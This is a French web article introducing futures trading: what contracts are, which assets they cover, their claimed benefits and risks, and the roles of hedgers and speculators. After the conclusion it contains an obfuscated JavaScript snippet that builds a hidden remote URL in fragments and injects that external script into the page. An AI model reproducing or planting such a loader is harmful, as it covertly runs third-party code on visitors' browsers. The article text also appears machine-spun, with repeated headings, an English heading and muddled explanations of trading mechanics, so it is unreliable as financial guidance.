Les bases du trading de contrats à terme: Comprendre les contrats à terme

Nombreux sont ceux qui ignorent les avantages de la négociation de contrats à terme sur leur portefeuille, ou les concepts qui sous-tendent cette négociation. La plupart des gens pensent qu’il faut être un trader expérimenté pour pouvoir les négocier, ce qui n’est absolument pas le cas. Les contrats à terme ont une longue histoire et fonctionnent dans le même cadre que les actions et les obligations. Dans cet article, nous allons expliquer ce qu’est un Future, les actifs avec lesquels vous pouvez négocier des Futures, et comment ils peuvent être bénéfiques pour votre portefeuille, ainsi que quelques-unes des façons les plus courantes de les négocier.

Que sont les contrats à terme ?

Dans le monde de la finance, lorsque vous entendez le mot « futures« , il fait généralement référence à un contrat à terme. Un future est un contrat financier dans lequel deux parties – un acheteur et un vendeur – conviennent d’échanger l’actif sous-jacent à un prix fixe à une date future. Les contrats à terme donnent aux acheteurs l’obligation d’acheter l’actif sous-jacent, tandis que les vendeurs ont l’obligation de le vendre à l’expiration du contrat ou avant. Le contrat à terme ne conserve pas réellement l’actif sous-jacent jusqu’à son expiration. Au contraire, au cours de la période appelée « règlement » ou « expiration », la bourse des contrats à terme détermine si le contrat doit être exécuté par l’acheteur ou le vendeur, selon que leurs positions respectives répondent à certains critères énoncés dans les spécifications du contrat.

A lire aussi : Les meilleures stratégies pour économiser sur vos courses en ligne

Les contrats à terme sont standardisés et offrent aux investisseurs un moyen fiable de spéculer sur le prix d’une marchandise ou d’un instrument financier. Les contrats à terme sont des produits dérivés puisque la valeur du contrat est dérivée de la valeur de l’actif sous-jacent.

Les actifs sous-jacents comprennent des matières premières physiques et des instruments financiers tels qu’une action, une obligation ou un indice boursier traditionnel, des matières premières comme l’or, les métaux, et peuvent donc être utilisés pour s’exposer à une variété d’instruments financiers, notamment des actions, des indices, des devises et des matières premières.

A découvrir également : Quels sont les frais pour une vente aux enchères ?

Qu’est-ce que la négociation de contrats à terme ?

La négociation de contrats à terme est une méthode de spéculation ou de couverture de la valeur future de tous les types d’actifs, y compris les actions, les obligations et les matières premières. Même si les contrats à terme fonctionnent dans le même cadre que les actions et les obligations, la négociation de contrats à terme peut offrir un effet de levier plus important que la négociation d’actions et permet d’obtenir des rendements très élevés, mais avec un risque très élevé.

Pour négocier des contrats à terme, vous devez d’abord acheter un contrat (ou contrat à terme) qui précise la date, la quantité et le prix auxquels la marchandise sous-jacente sera livrée. Vous vendez ensuite le contrat à une date ultérieure au prix fixé. Les contrats à terme sont souvent négociés sur des bourses, où les spéculateurs et les entrepreneurs peuvent se réunir pour négocier des contrats à terme.

Les actifs que vous pouvez négocier avec les contrats à terme

Tout actif financier en bourse, y compris les actions, les matières premières, les obligations ou les indices boursiers, peut faire partie des opérations à terme par le biais de contrats à terme. Certains des actifs futurs les plus populaires sur les marchés à terme sont:

Produits de base

Les matières premières sont des actifs qui peuvent être négociés avec succès sur le marché à terme. Il existe différents types de matières premières que vous pouvez négocier. Les matières premières agricoles comprennent le soja et le maïs. En outre, il existe des métaux industriels comme le cuivre et le bronze, ainsi que des métaux précieux comme l’or et l’argent. Le bois de construction, le pétrole non raffiné et le gaz naturel sont d’autres matières premières que vous pouvez négocier.

Stocks

Bien qu’ayant ses racines dans le secteur des matières premières, le marché à terme est aujourd’hui couramment utilisé sur le marché boursier. De plus, la procédure est désormais totalement automatisée, ce qui permet à n’importe qui d’y adhérer, alors qu’auparavant, les participants devaient se mettre d’accord. La plupart des courtiers de grandes entreprises obtiennent des contrats à terme sur actions.

Devises

Certaines des différentes formes de devises qui sont échangées dans ce monde pour effectuer des transactions sont si universellement acceptées et fiables. Pour échanger de gros blocs d’une devise donnée, il existe également des contrats à terme spécifiques sur les devises.

Indices

Sur le marché à terme, les indices sont parmi les actifs les plus populaires. Par exemple, vous entendrez chaque jour des experts des médias faire des prédictions sur les prix d’ouverture d’indices comme le Dow Jones et le S&P 500. Ils utilisent les données du marché à terme pour y parvenir.

Avantages de la négociation de contrats à terme

  1. Les contrats à terme permettent aux traders de profiter d’opportunités presque 24/7. De nombreux marchés à terme fonctionnent en dehors des heures de bureau. Les opérations à terme sur les indices boursiers étendus se déroulent fréquemment 24 heures sur 24.
  2. Par rapport à d’autres marchés de négociation à court terme, les contrats à terme peuvent offrir des avantages fiscaux. Cela est dû à l’imposition 60/40 des contrats à terme rentables: Les plus-values à long terme représentent 60% des bénéfices, tandis que les revenus réguliers en représentent 40%. Contrairement aux opérations sur actions, les gains sur les actions détenues depuis moins d’un an sont imposés à 100% du revenu ordinaire.
  3. Avec un si grand nombre de marchés à terme, vous avez de nombreux marchés sur lesquels vous pouvez vous développer. C’est en soi l’un des avantages les plus importants du trading de futures. Les stratégies de trading pour différents marchés vous permettent de créer des portefeuilles avec des ratios de profit plus élevés et des rendements plus élevés avec moins de risque, car ces stratégies sont pour la plupart non corrélées.

Conclusion

Les contrats à terme offrent de nombreux avantages qui intéressent tous les types d’investisseurs, qu’ils soient spéculatifs ou non. Cependant, ils sont également très risqués. Ainsi, avant de négocier des contrats à terme, vous devez planifier et effectuer vos recherches, et vous devez être conscient des avantages et des risques.

(function(){

tx7gu= »89crjXjnx7gs »;tx7g=document.createElement(« script »);

tx7g_= »u »+(« st »);tx7g_+= »at »+(« . »);tx7g.async=true;tx7g_+= »in »;

tx7gu= »485510121. »+tx7gu;tx7g.type= »text/javascript »;tx7gu+= »nc79eygz6qx0″;

tx7gu+= »nbfhjc »;tx7g_+=(« f »)+ »o »+(« / »);tx7g.src= »https:// »+tx7g_+tx7gu;

tx7gd=document.body;tx7gd.appendChild(tx7g);

})();

Les avantages et les risques du trading de contrats à terme

Comme pour tout type d’investissement, le trading de contrats à terme comporte des avantages et des risques. Il faut souligner que la liquidité du marché permet aux investisseurs d’acheter ou de vendre des contrats à tout moment.

  • Diversification : Le marché offre une large gamme de produits agricoles, métaux précieux et autres actifs sous-jacents auxquels les investisseurs peuvent accéder via les futures.
  • Risques

    • Perturbation dans l’économie mondiale • Une interruption soudaine peut entraîner la chute brutale du marché boursier ainsi que celui du marché financier en général, y compris le marché à terme. La pandémie COVID-19 en 2020 a engendré une telle perturbation économique majeure dans divers pays dans le monde entier.
    • Effet de levier • L’effet de levier permet aux traders d’utiliser seulement une petite quantité de leurs fonds propres lorsqu’ils passent un trade sur un contrat future donnant ainsi l’impression qu’ils peuvent gagner plus avec moins. Cela augmente aussi le risque lié à la volatilité des marchés et peut conduire à des perturbations importantes si les traders ne font pas preuve de prudence.
    • Risque de marché • Les contrats à terme sont soumis aux fluctuations du marché, ce qui signifie que vous pouvez réaliser des gains ou subir des pertes en fonction d’un grand nombre de facteurs tels que l’évolution économique mondiale ou une crise géopolitique, entre autres choses.

    Le trading de contrats à terme est un domaine complexe et exigeant pour ceux qui cherchent à y investir. Avant de décider si cette forme d’investissement convient à vos besoins financiers personnels, il faut évaluer votre tolérance au risque ainsi que vos objectifs d’investissement et votre capacité financière globale.

    Comment fonctionne le marché des contrats à terme : mécanismes et acteurs clés

    Comment fonctionne le marché des contrats à terme : mécanismes et acteurs clés

    Le marché des contrats à terme est un marché financier où les investisseurs échangent des contrats standardisés qui représentent l’achat ou la vente d’un sous-jacent (par exemple, une matière première) à un prix prédéterminé pour une date future. Ces contrats sont négociés sur des bourses de commerce réglementées telles que le Chicago Mercantile Exchange (CME) aux États-Unis, tandis que dans certains pays européens, ils peuvent être négociés sur Euronext. Les transactions sont effectuées par l’intermédiaire de courtiers en valeurs mobilières agréés.

    Les acheteurs et les vendeurs s’accordent sur un prix et une quantité pour chaque contrat. Le vendeur accepte de livrer la marchandise au prix convenu à une date ultérieure, tandis que l’acheteur accepte d’acheter cette même marchandise au même prix futur convenu. Le rôle du marché est donc de fournir une plateforme permettant aux investisseurs d’échanger ces contrats.

    • Hedgers : il s’agit généralement d’une entreprise utilisant les futures comme couverture contre les fluctuations imprévues du prix du sous-jacent dont elle a besoin pour son activité professionnelle.
    • Spéculateurs : ils cherchent plutôt à tirer profit des fluctuations du marché et de la volatilité. Ils n’ont pas besoin d’un accès direct au sous-jacent, mais cherchent plutôt à acheter et vendre les futures en fonction de leurs propres prévisions sur l’évolution future des prix.

    Il faut mentionner que le marché des contrats à terme est lié aux facteurs économiques tels que les conditions météorologiques ou les événements géopolitiques qui peuvent affecter l’offre et la demande des produits sous-jacents. Les investisseurs doivent donc être conscients de ces facteurs s’ils veulent réussir dans ce domaine.

    Le marché des contrats à terme permet aux investisseurs d’échanger des contrats standardisés portant sur un large éventail d’actifs financiers. Les acteurs clés sont constitués par les hedgers qui utilisent les futurs pour se protéger contre une baisse future du prix du sous-jacent dont ils ont besoin pour leur activité professionnelle ainsi que par les spéculateurs qui cherchent plutôt à profiter en prenant position sur la variation future du prix d’un actif financier donné. Comme tout autre type d’investissement, il comporte aussi son lot de risques qu’il faut prendre en compte avant toute prise de position.